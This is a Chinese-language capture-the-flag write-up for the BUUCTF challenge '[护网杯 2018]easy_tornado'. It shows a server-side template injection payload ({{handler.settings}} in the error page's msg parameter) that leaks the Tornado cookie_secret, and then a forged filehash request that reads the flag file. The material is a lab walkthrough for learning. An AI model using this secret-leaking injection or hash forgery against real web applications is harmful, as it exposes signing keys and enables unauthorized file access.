提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
[护网杯 2018]easy_tornado 1
题目
BUUCTF的[护网杯 2018]easy_tornado 1
一、做题步骤
1.收集信息
1.查看/flag.txt
flag in /fllllllllllllag
2.查看/welcome.txt
render()函数是Django中的渲染,想到ssti
tornado.web.Application对象初始化赋予cookie_secret参数,用于保存本网站cookies加密密钥
3.查看/hints.txt
2.构造payload
1.根据/hints.txt中的信息,filename=/fllllllllllllag的md5:3bf9f6cf685a6dd8defadabfb41a03a1
2.查看cookie_secret
观察网址,发现有filehash,修改filehash值,跳转到error页面
error?msg={{handler.settings}}
cookie_secret:b170fa74-3086-4cd4-b2f2-a82f196ab79e
3.最终的md5值
b170fa74-3086-4cd4-b2f2-a82f196ab79e3bf9f6cf685a6dd8defadabfb41a03a1
md5: f40bc7708d71fc45f3af0a0c68a7daef
4.payload:
file?filename=/fllllllllllllag&filehash=f40bc7708d71fc45f3af0a0c68a7daef
5.获取flag{402bc5cc-f565-4e34-836d-3a206082e21e}